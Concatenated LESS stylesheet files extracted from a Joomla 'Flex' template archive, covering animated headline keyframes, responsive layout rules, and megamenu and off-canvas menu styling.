.no-csstransitions .animated_headlines.rotate-2 i {
  .rotateX(0deg);
  opacity: 0;
}
.no-csstransitions .animated_headlines.rotate-2 i em {
  .scale(1);
}

/* Animations for "Animated Headlines" Addon */

// Rotate-1
@-webkit-keyframes cd-rotate-1-in {
  0% {
    -webkit-transform: rotateX(180deg);
    opacity: 0;
  }
  35% {
    -webkit-transform: rotateX(120deg);
    opacity: 0;
  }
  65% {
    opacity: 0;
  }
  100% {
    -webkit-transform: rotateX(360deg);
    opacity: 1;
  }
}
@keyframes cd-rotate-1-in {
  0% {
	.rotateX(180deg);
    opacity: 0;
  }
  35% {
	.rotateX(120deg);
    opacity: 0;
  }
  65% {
    opacity: 0;
  }
  100% {
	.rotateX(360deg);
    opacity: 1;
  }
}
@-webkit-keyframes cd-rotate-1-out {
  0% {
    -webkit-transform: rotateX(0deg);
    opacity: 1;
  }
  35% {
    -webkit-transform: rotateX(-40deg);
    opacity: 1;
  }
  65% {
    opacity: 0;
  }
  100% {
    -webkit-transform: rotateX(180deg);
    opacity: 0;
  }
}
@keyframes cd-rotate-1-out {
  0% {
	.rotateX(0deg);
    opacity: 1;
  }
  35% {
	.rotateX(-40deg);
    opacity: 1;
  }
  65% {
    opacity: 0;
  }
  100% {
	.rotateX(180deg);
    opacity: 0;
  }
}

// cd-pulse
@-webkit-keyframes cd-pulse {
  0% {
    -webkit-transform: translateY(-50%) scale(1);
    opacity: 1;
  }
  40% {
    -webkit-transform: translateY(-50%) scale(0.9);
    opacity: 0;
  }
  100% {
    -webkit-transform: translateY(-50%) scale(0);
    opacity: 0;
  }
}
@keyframes cd-pulse {
  0% {
    -webkit-transform: translateY(-50%) scale(1);
    -moz-transform: translateY(-50%) scale(1);
    -ms-transform: translateY(-50%) scale(1);
    -o-transform: translateY(-50%) scale(1);
    transform: translateY(-50%) scale(1);
    opacity: 1;
  }
  40% {
    -webkit-transform: translateY(-50%) scale(0.9);
    -moz-transform: translateY(-50%) scale(0.9);
    -ms-transform: translateY(-50%) scale(0.9);
    -o-transform: translateY(-50%) scale(0.9);
    transform: translateY(-50%) scale(0.9);
    opacity: 0;
  }
  100% {
    -webkit-transform: translateY(-50%) scale(0);
    -moz-transform: translateY(-50%) scale(0);
    -ms-transform: translateY(-50%) scale(0);
    -o-transform: translateY(-50%) scale(0);
    transform: translateY(-50%) scale(0);
    opacity: 0;
  }
}

// Rotate 2
@-webkit-keyframes cd-rotate-2-in {
  0% {
    opacity: 0;
    -webkit-transform: translateZ(-20px) rotateX(90deg);
  }
  60% {
    opacity: 1;
    -webkit-transform: translateZ(-20px) rotateX(-10deg);
  }
  100% {
    opacity: 1;
    -webkit-transform: translateZ(-20px) rotateX(0deg);
  }
}
@keyframes cd-rotate-2-in {
  0% {
    opacity: 0;
    -webkit-transform: translateZ(-20px) rotateX(90deg);
    -moz-transform: translateZ(-20px) rotateX(90deg);
    -ms-transform: translateZ(-20px) rotateX(90deg);
    -o-transform: translateZ(-20px) rotateX(90deg);
    transform: translateZ(-20px) rotateX(90deg);
  }
  60% {
    opacity: 1;
    -webkit-transform: translateZ(-20px) rotateX(-10deg);
    -moz-transform: translateZ(-20px) rotateX(-10deg);
    -ms-transform: translateZ(-20px) rotateX(-10deg);
    -o-transform: translateZ(-20px) rotateX(-10deg);
    transform: translateZ(-20px) rotateX(-10deg);
  }
  100% {
    opacity: 1;
    -webkit-transform: translateZ(-20px) rotateX(0deg);
    -moz-transform: translateZ(-20px) rotateX(0deg);
    -ms-transform: translateZ(-20px) rotateX(0deg);
    -o-transform: translateZ(-20px) rotateX(0deg);
    transform: translateZ(-20px) rotateX(0deg);
  }
}
@-webkit-keyframes cd-rotate-2-out {
  0% {
    opacity: 1;
    -webkit-transform: translateZ(-20px) rotateX(0);
  }
  60% {
    opacity: 0;
    -webkit-transform: translateZ(-20px) rotateX(-100deg);
  }
  100% {
    opacity: 0;
    -webkit-transform: translateZ(-20px) rotateX(-90deg);
  }
}
@keyframes cd-rotate-2-out {
  0% {
    opacity: 1;
    -webkit-transform: translateZ(-20px) rotateX(0);
    -moz-transform: translateZ(-20px) rotateX(0);
    -ms-transform: translateZ(-20px) rotateX(0);
    -o-transform: translateZ(-20px) rotateX(0);
    transform: translateZ(-20px) rotateX(0);
  }
  60% {
    opacity: 0;
    -webkit-transform: translateZ(-20px) rotateX(-100deg);
    -moz-transform: translateZ(-20px) rotateX(-100deg);
    -ms-transform: translateZ(-20px) rotateX(-100deg);
    -o-transform: translateZ(-20px) rotateX(-100deg);
    transform: translateZ(-20px) rotateX(-100deg);
  }
  100% {
    opacity: 0;
    -webkit-transform: translateZ(-20px) rotateX(-90deg);
    -moz-transform: translateZ(-20px) rotateX(-90deg);
    -ms-transform: translateZ(-20px) rotateX(-90deg);
    -o-transform: translateZ(-20px) rotateX(-90deg);
    transform: translateZ(-20px) rotateX(-90deg);
  }
}

// Slide
@-webkit-keyframes slide-in {
  0% {
    opacity: 0;
    -webkit-transform: translateY(-100%);
  }
  60% {
    opacity: 1;
    -webkit-transform: translateY(20%);
  }
  100% {
    opacity: 1;
    -webkit-transform: translateY(0);
  }
}
@keyframes slide-in {
  0% {
    opacity: 0;
    -webkit-transform: translateY(-100%);
    -moz-transform: translateY(-100%);
    -ms-transform: translateY(-100%);
    -o-transform: translateY(-100%);
    transform: translateY(-100%);
  }
  60% {
    opacity: 1;
    -webkit-transform: translateY(20%);
    -moz-transform: translateY(20%);
    -ms-transform: translateY(20%);
    -o-transform: translateY(20%);
    transform: translateY(20%);
  }
  100% {
    opacity: 1;
    -webkit-transform: translateY(0);
    -moz-transform: translateY(0);
    -ms-transform: translateY(0);
    -o-transform: translateY(0);
    transform: translateY(0);
  }
}
@-webkit-keyframes slide-out {
  0% {
    opacity: 1;
    -webkit-transform: translateY(0);
  }
  60% {
    opacity: 0;
    -webkit-transform: translateY(120%);
  }
  100% {
    opacity: 0;
    -webkit-transform: translateY(100%);
  }
}

@keyframes slide-out {
  0% {
    opacity: 1;
    -webkit-transform: translateY(0);
    -moz-transform: translateY(0);
    -ms-transform: translateY(0);
    -o-transform: translateY(0);
    transform: translateY(0);
  }
  60% {
    opacity: 0;
    -webkit-transform: translateY(120%);
    -moz-transform: translateY(120%);
    -ms-transform: translateY(120%);
    -o-transform: translateY(120%);
    transform: translateY(120%);
  }
  100% {
    opacity: 0;
    -webkit-transform: translateY(100%);
    -moz-transform: translateY(100%);
    -ms-transform: translateY(100%);
    -o-transform: translateY(100%);
    transform: translateY(100%);
  }
}

// Zoom
@-webkit-keyframes zoom-in {
  0% {
    opacity: 0;
    -webkit-transform: translateZ(120px) scale(1.2);
  }
  100% {
    opacity: 1;
    -webkit-transform: translateZ(0) scale(1);
  }
}

@keyframes zoom-in {
  0% {
    opacity: 0;
	-webkit-transform: translateZ(120px) scale(1.2);
    -moz-transform: translateZ(120px) scale(1.2);
    -ms-transform: translateZ(120px) scale(1.2);
    -o-transform: translateZ(120px) scale(1.2);
    transform: translateZ(120px) scale(1.2);
  }
  100% {
    opacity: 1;
    -webkit-transform: translateZ(0) scale(1);
    -moz-transform: translateZ(0) scale(1);
    -ms-transform: translateZ(0) scale(1);
    -o-transform: translateZ(0) scale(1);
    transform: translateZ(0) scale(1);
  }
}
@-webkit-keyframes zoom-out {
  0% {
    opacity: 1;
    -webkit-transform: translateZ(0);
  }
  100% {
    opacity: 0;
    -webkit-transform: translateZ(-60px);
  }
}
@keyframes zoom-out {
  0% {
    opacity: 1;
    -webkit-transform: translateZ(0) scale(1);
    -moz-transform: translateZ(0) scale(1);
    -ms-transform: translateZ(0) scale(1);
    -o-transform: translateZ(0) scale(1);
    transform: translateZ(0) scale(1);
  }
  100% {
    opacity: 0;
    -webkit-transform: translateZ(-60px) scale(0.8);
    -moz-transform: translateZ(-60px) scale(0.8);
    -ms-transform: translateZ(-60px) scale(0.8);
    -o-transform: translateZ(-60px) scale(0.8);
    transform: translateZ(-60px) scale(0.8);
  }
}


// Rotate-3
@-webkit-keyframes cd-rotate-3-in {
  0% {
    -webkit-transform: rotateY(180deg);
  }
  100% {
    -webkit-transform: rotateY(0deg);
  }
}
@keyframes cd-rotate-3-in {
  0% {
	.rotateY(180deg);
  }
  100% {
    .rotateY(0deg);
  }
}
@-webkit-keyframes cd-rotate-3-out {
  0% {
    -webkit-transform: rotateY(0);
  }
  100% {
    -webkit-transform: rotateY(-180deg);
  }
}
@keyframes cd-rotate-3-out {
  0% {
    .rotateY(0deg);
  }
  100% {
	.rotateY(-180deg);
  }
}

// Scale

@-webkit-keyframes scale-up {
  0% {
    -webkit-transform: scale(0);
    opacity: 0;
  }
  60% {
    -webkit-transform: scale(1.2);
    opacity: 1;
  }
  100% {
    -webkit-transform: scale(1);
    opacity: 1;
  }
}
@keyframes scale-up {
  0% {
	.scale(0);
    opacity: 0;
  }
  60% {
	.scale(1.2);
    opacity: 1;
  }
  100% {
	.scale(1);
    opacity: 1;
  }
}
@-webkit-keyframes scale-down {
  0% {
    -webkit-transform: scale(1);
    opacity: 1;
  }
  60% {
    -webkit-transform: scale(0);
    opacity: 0;
  }
}
@keyframes scale-down {
  0% {
    .scale(1);
    opacity: 1;
  }
  60% {
    .scale(0);
    opacity: 0;
  }
}

// Push
@-webkit-keyframes push-in {
  0% {
    opacity: 0;
    -webkit-transform: translateX(-150%);
  }
  65% {
    opacity: 1;
    -webkit-transform: translateX(10%);
  }
  100% {
    opacity: 1;
    -webkit-transform: translateX(0);
  }
}
@keyframes push-in {
  0% {
    opacity: 0;
    -webkit-transform: translateX(-150%);
    -moz-transform: translateX(-150%);
    -ms-transform: translateX(-150%);
    -o-transform: translateX(-150%);
    transform: translateX(-150%);
  }
  65% {
    opacity: 1;
    -webkit-transform: translateX(10%);
    -moz-transform: translateX(10%);
    -ms-transform: translateX(10%);
    -o-transform: translateX(10%);
    transform: translateX(10%);
  }
  100% {
    opacity: 1;
    -webkit-transform: translateX(0);
    -moz-transform: translateX(0);
    -ms-transform: translateX(0);
    -o-transform: translateX(0);
    transform: translateX(0);
  }
}
@-webkit-keyframes push-out {
  0% {
    opacity: 1;
    -webkit-transform: translateX(0);
  }
  
  100% {
    opacity: 0;
    -webkit-transform: translateX(150%);
  }
}
@keyframes push-out {
  0% {
    opacity: 1;
    -webkit-transform: translateX(0);
    -moz-transform: translateX(0);
    -ms-transform: translateX(0);
    -o-transform: translateX(0);
    transform: translateX(0);
  }

  100% {
    opacity: 0;
    -webkit-transform: translateX(150%);
    -moz-transform: translateX(150%);
    -ms-transform: translateX(150%);
    -o-transform: translateX(150%);
    transform: translateX(150%);
  }
}PK!-H(���flex/less/responsive.lessnu&1i�.hidden-print {
	padding:0 25px;
	margin:0;
	text-align:center;
	position:relative;
	display:table;
	>a {
		display:table;
		margin:0;
		right:0;
		padding:8px 40px;
		background:#18A2B8;
		color:#fff;
		border-radius:3px;
		letter-spacing:1px;
		text-transform: uppercase;
		text-shadow:1px 2px 2px rgba(0,0,0,.2);
		font-weight:500;
	}
}
@media print {
	.visible-print {
		display: inherit!important;
	}
	.hidden-print {
		display: none!important;
	}
}

@media (min-width: @screen-md) {
	
	#sp-addspace-logo {
		div.row {
			.flexbox();
			.flex-align-items();
		}
	}
	.no-gutter .row > [class*="col-md"],
	.no-gutter .row-fluid > [class*="col-"],
	.no-padding > div > .row > [class*="col-"],
	.no-padding > div > .row-fluid > [class*="col-"],
	.no-gutter {
		padding-right:0;
		padding-left:0;
		.flexbox();
		.flex-align-items();
		.flex-justify-content(center);
	}
	
	
}

@media (min-width: @screen-md-min) and (max-width: @screen-md-max) {
	
	.sp-megamenu-parent {
		padding:0;
		>li {
			>a {
				padding: 0 8px;

			}
		}
	}	
	
}

@media (min-width: @screen-sm-min) and (max-width: @screen-md-min){

	.flipper {
		.back {
			overflow:hidden;
			.sppb-person-block {
				.sppb-person-information {
					padding:2px 5px 0 5px!important;
				}
			}

			.sppb-person-introtext {
				padding:3px 10px!important;
				margin-top:0;
				font-size:80%!important;
			}
			.sppb-person-social-icons {
				position:absolute;
				width:100%;
				line-height:35px;
				margin-bottom:-8px;
				background:#fff;
			}
		}
	}
	.btn,
	.sppb-btn {
		&.responsive{
			white-space: normal;
		}
	}
	
	.sp-comingsoon {
		a.logo {
			img.sp-default-logo {
				margin:0 auto!important;
			}
			div.backhome {
				display:none;
			}
			&:hover {
				img.sp-default-logo {
					text-align:center;
					margin:0 auto;
				}
			}
		}
	}
}
@media (max-width: @screen-sm-min) {
	
	#sp-addspace-logo {
		div.row {
			img {
				margin: 2vh 0;
			}
		}
	}
	/* Fixing Container and left/right when SPPB page is inside Joomla Articles */
	.has-left-right-modules {
		.sppb-in-article-left,
		.sppb-in-article-right { 
			.sp-column {
				width:100%;
				padding:15px 35px;
			}
		}
	}
	
	#sp-top2 { 
		//width:auto;
		margin-left: auto;
		margin-right: auto;
		//.flexbox();
		//.flex-align-items();
		//.flex-justify-content(center);	
		

		ul{
			width:auto;
			margin-left: auto;
			margin-right: auto;
		}
	}
	#sp-addspace-logo {
		#sp-logo, #sp-addspace {
			.flex-justify-content(center); //  to the center
		}	
	}

	
	
	
	.addspace,
	.centered {
		.sp-column {
			text-align:center;
			//margin:0 auto;
			//padding:0;
			
			
			>div{
				//display:block;
				width:100%;
				margin:0 auto;
				
			}
		}
		
	
		>.container {	
			>.row {

				#cart-menu {
					
					float:left;
					
					&.shopping-menu-is-open {
						padding:0;
						width:100vw;
						height:100vh;
					}
				}
			}
		}
	
	}
	
	//Top search
	.top-search-wrapper{
		right:30px;
		width:50px;
		
		.icon-top-wrapper{
			cursor: pointer;
			width:50px;
	
			i.fa, i.fas, i.far {
				font-size:16px;
				text-align:center;
				width:50px;
				margin:0 auto;
				
			}
			i.pe {
				font-size:20px;
				text-align:center;
				width:50px;
				margin:0 auto;
				
			}
			i.pe.search-close-icon.open {
				font-size:27px;
			}
		}
	}
	
	.top-search-input-wrap{
	
		.top-search-wrap {
			position:absolute;
			right:5vw;
			left:auto;
			float:none;
			width:70vw;
			margin:-20px auto 0;
			.sp_search_input{
				width:80vw;
				margin:0 auto;
			}
		}
	}
	
	.centered, .addspace {
		.top-search-wrap {
			position:absolute;
			right:-20vw;
			left:auto;
			float:none;
			width:70vw;
			margin:-20px auto 0;
			
		}
	}
	
	.sppb-addon-image-content {
		.sppb-image-holder {
			position: inherit;
			width: 100%;
			min-height: 350px;
		}
	
	}
	.com-sppagebuilder #sp-main-body #sp-left,
	.com-sppagebuilder #sp-main-body #sp-right {
		padding:0 30px;
		margin-left:0;
		margin-right:0;
	}
	.sppb-content-holder {
		padding: 20px 0 50px 0!important;
	}
	
	.sppb-addon-animated-number {
		text-align:center;
	}
	
	.flipper {
		width:100%;
		margin:25px auto;
		.back {
			.sppb-person-block {
				.thumb,.sppb-person-information {
					width:50%;
				}
				.sppb-person-information {
					padding:15px 10px 15px 20px;
						
						.sppb-person-name {
							font-size:160%;
						}
						.sppb-person-designation {
							line-height:1.6;
							font-size:120%;
						}
				}
		    }
			.sppb-person-introtext {
				padding:15px 25px;
				line-height:1.8!important;
				font-size:100%!important;
			}
		}
	}
	.sp-comingsoon {
		a.logo {
			img.sp-default-logo {
				margin:0 auto!important;
			}
			div.backhome {
				display:none;
			}
			&:hover {
				img.sp-default-logo {
					text-align:center;
					margin:0;
				}
			}
		}
	}
	.mobile-centered {
		text-align:center!important;
		margin-left: auto !important;
		margin-right: auto !important;
		float:none!important;
		display:table;
	}
	
	
	// Offline Page
	.offline-container {
		width:100vw;
		
		.offline-inner {
			width:90vw;
			border-radius:4px;
			
			
			.sp-comingsoon-countdown {
				padding:0;
			}
			.days,
			.hours,
			.minutes,
			.seconds{
				width: 23%;
				padding:5px;
			}	
		}
	}
	
}

@media (max-width: @screen-xs) {
	/* Fixed full width for products in VM Shop on "mobile" */
	.productwrap .product {
		width:100%;
		display:block;
	}
	.offline-container {
		
		.offline-inner {
			
			#form-login {
				width:90%;
			}
		}
	}
	
	.cd-headline .cd-words-wrapper > b {
		white-space:normal;
		clear:both;
	}
	
	// Timeline addon (from SPPB 2.3.5)
	.sppb-addon-timeline .sppb-addon-timeline-wrapper .timeline-badge::before,
    .sppb-addon-timeline .sppb-addon-timeline-wrapper .timeline-badge::after,
    .sppb-addon-timeline .sppb-addon-timeline-wrapper::before,
    .sppb-addon-timeline .sppb-addon-timeline-wrapper::after {
        display: none;
    }
	.timeline-movement {
		padding:0;
		
		&:before,
		&:after{
			padding:0;
		}
		&.odd,
		&.even {
			width: 100%;
			display:table;
			margin:0 auto;
			left:0;
			right:0;
			position:relative;
		}
		&.odd:after {
			position:relative;
			margin:50px auto;
			height: 1px;
			top:48px;
			bottom:auto;
			width: 40%;
			padding:0;
			background-color: lighten(@major_color, 20%);
		}
		
		 &.even:before {
			background-color: lighten(@major_color, 20%);
			bottom: 10px;
			content: " ";
			height: 1px;
			left: 0;
			position: absolute;
			right: 0;
			top: auto;
			width: 40%;
			margin: 0 auto;
		}
		&.even:after{
			display:none;
		}
	}
	
	/* SP Cookie Consent */
	#sp-cookie-consent.position-bottom_left,
	#sp-cookie-consent.position-bottom_right {
		width: calc(100% - 10px)!important;
		margin:0 auto;
		bottom: 20px;
		box-shadow:0 4px 8px rgba(50,50,50,.2);
	}
	
}

@media only screen and (max-device-width: 800px), only screen and (device-width: 1024px) and (device-height: 600px), only screen and (width: 1280px) and (orientation: landscape), only screen and (device-width: 800px), only screen and (max-width: 767px) {
.flex-video { padding-top: 0; }
}
PK!,v�}�}�flex/less/menu.lessnu&1i�/**
 * Flex @package Helix Framework
 * @author Aplikko http://www.aplikko.com
 * @copyright Copyright (c) 2020 Aplikko
 * @license http://www.gnu.org/licenses/gpl-2.0.html GNU/GPLv2 or later
*/
/*=========================================
 *======= 	 Megamenu	   ============
 *=======================================*/
.sp-megamenu-wrapper .sp-megamenu-parent .hide-it,
.sp-megamenu-wrapper .sp-megamenu-parent .separator .hide-it {
	display:none;
}
.sp-megamenu-parent {
	list-style: none;
	padding: 0;
	margin: 0 auto;
	display:block; /* for older browsers */

	
	>li {
		display: inline-block;
		position: relative;
		padding: 0;

		&.menu-justify {
			position: static;
		}
		
		>a {
			display: inline-block;
			padding: 0 12px;
			-webkit-transform: translateZ(0);
			
				>i {
					text-align:center;
					display:inline-table;
					min-width:1.7em;
				}
		}

		.nav-header,
		.separator,
		.separator > a {
			cursor:default!important;
		}

		&.sp-has-child>a:after{
			font-family: "peIcon7";
			content: "\e688";
			padding:0 3px;
			vertical-align:middle;
			font-size:90%;
			opacity:.9;
			border:0;
			.transition(opacity .3s ease-in-out);
		}
			&.sp-has-child>a:hover:after {
				font-family: "peIcon7";
				content: "\e680";
				opacity:.7;
				border:0;
			}
	}

	.sp-module {
		//padding: 10px;
	}
	
	.sp-mega-group {
		list-style: none;
		padding: 0;
		margin: 0!important;

		.sp-mega-group-child {
			list-style: none;
			padding: 0;
			margin: 0;
			
		}
	}

	.sp-dropdown {
		margin: 0;
		padding: 0;
		position: absolute;
		z-index: 10;
		display: none;
		visibility:hidden; /* Hides on some animations */
		width:100%; /* Fix for sp-menu-full */

		.sp-dropdown-inner {
			background: inherit;
			box-shadow: 0 3px 5px 0 rgba(0, 0, 0, 0.2);
			padding: 10px;
			
		}
		

		.sp-dropdown-items {
			list-style: none;
			padding: 0;
			margin:0;


			.sp-has-child {
				>a {
					border:0;
					&:after{
						font-family: "peIcon7";
						content: "\e684";
						border:0;
						float: right;
						padding:0;
						vertical-align:middle;
						font-size:100%;
						opacity:0.9;
						.transition(all .3s ease-in-out);
					}
					&:hover:after{
						font-family: "peIcon7";
						content: "\e688";
						opacity:1;
						border:0;
					}
				}
			}
	
		}

		&.sp-menu-center {
			margin-left: 45px;
		}
		
		&.sp-dropdown-main {
            top: 100%;
			
            &.sp-menu-right {
                left: 0;
            }
            &.sp-menu-full {
                left: 0; /* IMPORTANT Fix left:0 to always shift full dropdown menu */
                right: 0;
				margin:0 auto;
            }

            &.sp-menu-left {
                right: 0;
            }
        }
		/* 2nd, 3rd, 4th level */
		&.sp-dropdown-sub {
			top: -10px; /* back up 10 pixels to level */
			left: 100%;
			border-top:0;
			border-bottom:0;
			border-left:10px solid transparent;
			border-right:10px solid transparent;
			
			.sp-dropdown-inner {
				box-shadow: 0 0 5px rgba(0, 0, 0, 0.2);
			}
		}

		//List Item
		li.sp-menu-item { //child sub
			display: block;
			padding: 0;
			position: relative;
			
			>a {
				display: block;
				padding: 5px 10px;
				margin-bottom:2px;
				color: #333;
				cursor: pointer;
				font-size:90%; // a bit smaller font

				&.sp-group-title {
					text-transform: uppercase;
					font-weight: bold;
				}
				>i {
					text-align:center;
					padding-right:5px;
					min-width:1.4em;
					opacity:0.8;
				}
				&:hover {
					color: #fff;
					border-radius:3px;
					>i {
						opacity:1;
					}
				}

			}
			&.active>a>i {
				opacity:1;
			}
			&.current-item>a {
				border-radius:3px;
			}
			&.separator {
				>a {
					line-height:2;
					margin-bottom:10px;			
				}

			}
		}
	}

	.sp-dropdown-mega {
		.sp-dropdown-inner {
			>.row {
				margin-top: 30px;
				
				&:first-child {
					margin-top: 0;
				}
				div:last-child {
					.sp-mega-group {
						padding: 0;
						margin:0 0 0 -20px;
						border-right:none;	
					}
				}
			}
		}
	}


	//Has Child
	.sp-has-child {
		&:hover {
			>.sp-dropdown {
				display: block;
				visibility:visible;
			}
		}
	}

    // (Simple) Fade Animation
    &.menu-fade {
		
		.sp-has-child {
			>.sp-dropdown {
				display: block;
				opacity: 0;
				visibility: hidden;
				-webkit-transform: translate3d(0,0,0);
				-moz-transform: translate3d(0,0,0); 
        		transform: translate3d(0,0,0);
				.transition(~'opacity .35s ease, visibility .35s ease');	
			}
		}

		.sp-has-child:hover {
			>.sp-dropdown {
				display:block;
				opacity:1;
				visibility:visible;
			}
		}
		/* Old
        .sp-has-child:hover {
            >.sp-dropdown {
                -webkit-animation: spMenuFadeIn 0.4s ease;
                animation: spMenuFadeIn 0.4s ease;
				-webkit-transform-origin: 50% 0%;
				transform-origin: 50% 0%;
            }
        }
		*/
		
    }

    //Zoom Animation
    &.menu-zoom {
        .sp-has-child:hover {
            >.sp-dropdown {
                -webkit-animation: spMenuZoom 0.6s ease;
                animation: spMenuZoom 0.6s ease;
				-webkit-transform-origin: 50% 0%;
				transform-origin: 50% 0%;
            }
        }
    }
	
	//Fade in down Animation
	&.menu-fade-down {

		.sp-has-child:hover {
			>.sp-dropdown {
				opacity:0;
				visibility:hidden;
				-webkit-animation:spMenuFadeInDown 0.35s ease forwards 0.1s;
				animation:spMenuFadeInDown 0.35s ease-in-out forwards 0.1s;
	
			}
		}
	}
	
	//Fade in down, Fade out up Animation
	&.menu-fade-down-fade-up {
		.sp-has-child {
			>.sp-dropdown {
				display: block;
				margin:0;
				opacity: 0;
				visibility: hidden;
				-webkit-transform: translateY(-25px);
				-moz-transform: translateY(-25px); 
        		transform: translateY(-25px);
				.transition(~'transform .4s ease, opacity .2s ease .1s, visibility .2s ease .1s');	
			}
		}

		.sp-has-child:hover {
			>.sp-dropdown {
				display:block;
				opacity:1;
				visibility:visible;
				-webkit-transform: translateY(0px);
				-moz-transform: translateY(0px); 
        		transform: translateY(0px);
			}
		}
	}
}
/* Safari hack for font-weight */
.safari .sp-megamenu-parent li a {
    //-webkit-font-smoothing: subpixel-antialiased;
    -webkit-transform: translateZ(0);
}


/*=========================================
 *======= 	Off Canvas   ============
 *=======================================*/
#offcanvas-toggler {
	float: right;
	position:relative;
	z-index:3;

	>i {
		display: inline-table;
		text-align:center;
		width:32px;
		padding: 0;
		font-size: 18px;
		background:transparent;
		vertical-align:middle;
		margin:-5px auto 0;
		border-radius: 3px;
		cursor: pointer;
		.transition(~'color 400ms, background-color 400ms');
		&:hover {
			color: #fff;
		}
	}
}
.off-canvas-menu-init{
    overflow-x: hidden;
    position: relative;
}
.offcanvas {
    .offcanvas-overlay{
        visibility: visible;
        opacity: 1;
    }
	
}
.offcanvas-overlay {
    background: rgba(0,0,0,.2);
    bottom: 0;
    left: 0;
    opacity: 0;
    position: absolute;
    right: 0;
    top: 0;
    z-index: 999;
    visibility: hidden;
    -webkit-transition: .5s cubic-bezier(0.5,0,0.3,1);
    transition: .5s cubic-bezier(0.5,0,0.3,1);
}
.off-canvas-menu-wrap{
    position: relative;
    -webkit-transition: .5s cubic-bezier(0.5,0,0.3,1);
    transition: .5s cubic-bezier(0.5,0,0.3,1);
    right: 0;
    top:0;
	backface-visibility: hidden;
	
}

.close-offcanvas {
	position: absolute;
	top: 15px;
	right: 15px;
	z-index: 1;
	color: #777;
	background: transparent;
	border: 1px solid #ccc;
	border-radius: 100%;
	width: 22px;
	height: 22px;
	line-height: 20px;
	text-align: center;
	font-size: 12px;
	.transition(~'border 300ms, color 300ms');
	
}

// Accordion menu
.accordion-menu {
	li{
		position:relative;
		
		a {
			padding:10px 20px;
			line-height: 28px;
			.transition(1.7s ease);
			
			>img {
				max-height:20px;/* image icon */
				max-width:20px;
				display:inline;
				margin:-4px 7px 0 0;
			}
			
		
			> i {
				width:24px;
				text-align:center;
				margin:0 auto;
				text-indent:0;
				
				&.pe {
					font-size:110%;
					margin-top:-2px;
					vertical-align:middle;
				}
				
				&:before {
					width:24px;
					text-align:center;
					margin:0 auto;
				}
			}
		}
		
		//sub-levels
		ul > li > a {
			text-indent: 10px;
		}
		ul > li > ul > li > a {
			text-indent: 20px;
		}
		
		.accordion-menu-toggler {
			display: inline-block;
			position: absolute;
			top: 0;
			right: 0;
			width:33%;
			line-height: 41px;
			cursor: pointer;
				
				.open-icon {
					text-align:center;
					font-size:0.7em;
						
					&:before {
						
						line-height: 32px;
						text-align:center;
						position: absolute;
						right:12px;
						top: 5px;				
						-webkit-transform: rotate(180deg);
						transform: rotate(180deg);
						.transition(.3s ease);
					}	
				}
	
				&.collapsed {
					.open-icon {
					
						&:before {
							-webkit-transform: rotate(0deg);
							transform: rotate(0deg);
						}
					}
				}
	
		}
		.separator {
		
			border-bottom: none;
			padding:0;

			> a:hover {
				//background: #f5f5f5;
			}
			
		}
	
		.divider-separator{
			display: none;
			>a:before,
			>a:after {
				display: none;
				text-indent:-9999em;
			}
		}
	
	}
	
	li.active {					
		.accordion-menu-toggler {	
			
			&.active-open {
				.open-icon {
					color:@major_color;
				}
			}
		}
	}
}

.offcanvas-menu {
    width:  320px;
    height: 100vh;
	background: #fff;
	box-shadow:-1px 0 10px rgba(0,0,0,.15);
    color: #777;
    position: fixed;
    top: 0;
    right: 0;
    -webkit-transform: translateX(320px);
    transform: translateX(320px);
    visibility: hidden;
	overflow-y: scroll;
    .transition(.5s cubic-bezier(0.5,0,0.3,1));
    z-index: 1007;

	.offcanvas-inner {
		padding: 30px 20px 20px;
		.sp-module {
			margin-top: 20px;
			ul {
				> li{
					border: none;
					position: relative;
					a, .nav-header, .separator {
						display:block;
						.transition(300ms);
						padding:4px 20px;
						line-height:2;

						&:before{
 							display: none;
 						}
						
						>img {
							max-height:22px;/* image icon */
							max-width:22px;
							display:inline;
							margin:-4px 7px 0 0;
						}
						
					
						> i {
							width:24px;
							text-align:center;
							margin:0 auto;
							text-indent:0;
							
							&.pe {
								font-size:110%;
								margin-top:-2px;
								vertical-align:middle;
							}
							
							&:before {
								width:24px;
								text-align:center;
								margin:0 auto;
							}
						}
						
					}
	
					/* Text Separator for Off-Canvas menu */
					.divider {	
						background:transparent;	
						display:block;
						height:auto;
						margin:0;
						padding: 0;
						z-index:0;
						.separator {
							background:transparent;
							display:none; // hidding from view
							position:relative;
							width:100%;
							padding: 0;
							text-indent:-9999em;
							clear:both;
						}
						.text {
							padding:4px 20px;
							display:block; // bringing to view
							text-indent:0;
						}	
					}
			
					>a:before,
					>a:after {
						display: none;
					}
					ul > li > a {
						text-indent: 10px;
                    }
					ul > li > ul > li > a {
						text-indent: 20px;
                    }
	
				}
				
				// Accordion menu (offcanvas)
				&.accordion-menu {
					> li{
						
						
						a {
							padding:10px 20px;
							line-height: 28px;
						}
						
						.accordion-menu-toggler {
 							display: inline-block;
							position: absolute;
							top: 0;
							right: 0;
							padding-right:50px;
							cursor: pointer;
							.open-icon {
					 			&:before {
									right:20px;
								}
							}
	
						}
						.separator {
						
							border-bottom: none;
							padding:0;

							> a:hover {
								//background: #f5f5f5;
							}
							
						}
					
						.divider-separator{
							display: none;
							>a:before,
							>a:after {
								display: none;
								text-indent:-9999em;
							}
						}
						
					}
				}
			}
			
			&:first-child {
				margin-top: 0;
			}			
		}	
		
		.sp-module .sp-module-content > ul {
			margin:0 -18px;
		}
		.search {
			margin-top: 32px;
			input {
				width: 100%;
				background: transparent;
				border-radius: 0;
				border: 1px solid #eee; 
				box-shadow: none;
				-webkit-box-shadow: none;
			}
		}
	}
}


.offcanvas {
	width: 100%;
	height:100%;
	position: relative;
	.transition(.5s cubic-bezier(0.5,0,0.3,1));

	.body-innerwrapper:after {
		width: 100%;
		height: 100%;
		opacity: 1;
		.transition(opacity 0.5s);
		
	}
	
	.off-canvas-menu-wrap{
        right: 0;
        -webkit-transform: translateX(-320px);
        transform: translateX(-320px);
		
		
    }
    .off-canvas-menu-wrap:after {
        width: 100%;
        height: 100%;
        right: 0;
    }
	.offcanvas-menu {
		opacity: 1;
		visibility: visible;
        z-index: 9999;
        right: 0;
		position:fixed; /* Fix for some mobile devices - Flex 3.5 */
		height: 100%; /* Fix for some mobile devices - Flex 3.5 */
        -webkit-transform: translateX(0);
        transform: translateX(0);
		
 		
		/* 2nd, 3rd, 4th and 5th level */
		.nav-child li a,
		.nav-child li .nav-child li a,
		.nav-child li .nav-child li .nav-child li a,
		.nav-child li .nav-child li .nav-child li .nav-child li a {
			text-indent:15px;
		}
		
	}
	
}

 .offcanvas-overlay {
 	opacity: 0;
